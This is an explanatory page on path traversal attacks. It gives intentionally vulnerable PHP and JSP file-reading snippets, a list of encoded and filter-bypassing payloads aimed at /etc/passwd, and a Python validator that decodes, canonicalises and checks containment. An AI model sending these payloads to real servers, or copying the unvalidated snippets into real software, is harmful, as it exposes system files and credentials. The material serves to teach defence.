Path Traversal

Path traversal (also called directory traversal) is an attack that allows an attacker to read arbitrary files on the server running an application. With path traversal an attacker can read:

  • Sensitive operating system files

  • Application code and data

  • Credentials for backend systems

Vulnerable code snippets

PHP

$file = $_GET['file'];                       // attacker-controlled, never validated
if (file_exists('/var/www/html/' . $file)) {
    readfile('/var/www/html/' . $file);      // serves whatever path the concatenation resolves to
}

JSP

<%@ page import="java.io.FileInputStream" %>
String file = request.getParameter("file");                   // attacker-controlled, never validated
FileInputStream f = new FileInputStream("/var/www/" + file);  // any ../ in file is resolved by the OS
byte[] data = f.readAllBytes();                               // Java 9+; reads the whole file reliably
f.close();
response.getOutputStream().write(data);

Techniques

  • Direct: /etc/passwd

  • Traversing: ../../../../../etc/passwd

  • If ../ is filtered (stripped in a single, non-recursive pass): ....//....//....//....//

  • URL encoding: %2e%2e%2f

  • Double URL encoding: %252e%252e%252f

  • Start of the path is validated (must begin with the expected base folder): /var/www/html/images/../../../../etc/passwd

  • File extension validated? Use a null byte: ../../../../../etc/passwd%00.png

Note: In Node.js applications, many instances of traversal occur by appending a traversal sequence directly to a static-file route, e.g.:

https://example.com/file/static/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
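The fix for the snippets above is to decode, canonicalise, and then check containment against the web root, rather than string-matching the raw input. This added example (not code from the original page) assumes the PHP snippet's web root of /var/www/html and runs each technique from the list above through such a check, alongside the single-pass "../" filter that the ....// trick defeats:

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed web root, taken from the PHP snippet above (constructed for this example).
BASE_DIR = "/var/www/html"


def naive_strip(user_path: str) -> str:
    """A single-pass '../' filter: the kind of check the '....//' technique defeats."""
    return user_path.replace("../", "")


def resolve_in_base(user_path: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Return the canonical path if it stays inside base_dir, otherwise None.

    Order matters: decode first (so %2e%2e%2f and %252e%252e%252f both collapse
    to '../'), reject null bytes, then canonicalise and check containment on a
    directory boundary rather than on a raw string prefix.
    """
    decoded = user_path
    for _ in range(3):  # decode until stable; double encoding needs two passes
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:  # '%00.png' truncates the name in older PHP/Java runtimes
        return None
    # posixpath.join discards base_dir when the input is absolute ('/etc/passwd'),
    # so a direct absolute path is rejected by the containment check below.
    candidate = posixpath.normpath(posixpath.join(base_dir, decoded))
    if candidate != base_dir and not candidate.startswith(base_dir + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for p in ["images/logo.png", "/etc/passwd", "../../../../../etc/passwd",
              "%252e%252e%252f%252e%252e%252fetc/passwd",
              "/var/www/html/images/../../../../etc/passwd",
              "../../../../../etc/passwd%00.png", "....//....//etc/passwd"]:
        print(repr(p), "->", resolve_in_base(p))
    print("naive filter turns '....//....//' into:", naive_strip("....//....//etc/passwd"))
```

Without a stripping filter, ....// is just an odd directory name under the web root, which is why canonicalisation plus containment is preferable to pattern removal.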
